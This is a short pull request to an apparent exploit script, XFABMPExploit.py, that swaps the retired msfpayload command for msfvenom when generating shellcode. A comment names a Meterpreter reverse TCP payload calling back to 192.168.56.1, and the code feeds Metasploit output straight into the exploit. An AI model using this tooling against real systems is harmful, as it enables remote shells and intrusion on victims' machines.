### PR TITLE
Update for msfvenom

### DIFF
--- a/XFABMPExploit.py
+++ b/XFABMPExploit.py
@@ -733,7 +733,7 @@ if __name__ == '__main__':
         os.exit(-1)
     if options.payload == None:
         #'windows/meterpreter/reverse_tcp LHOST=192.168.56.1 EXITFUNC=process R'
-        msfpayload = Popen('msfpayload %s R'%options.msfpayload, shell=True, stdout=PIPE)
+        msfpayload = Popen('msfvenom -f raw -p %s '%options.msfpayload, shell=True, stdout=PIPE)
         shellcode = msfpayload.communicate()[0]
     else:
         shellcode = file(options.payload, 'rb').read() #options.hexpayload.decode('hex')


### PR DESCRIPTION
The msfpayload and msfencoder tools have been folded into msfvenom,
rendering the msfpayload command non-functional on newer Metasploit
installs. This change fixes the code so it works with newer MSF.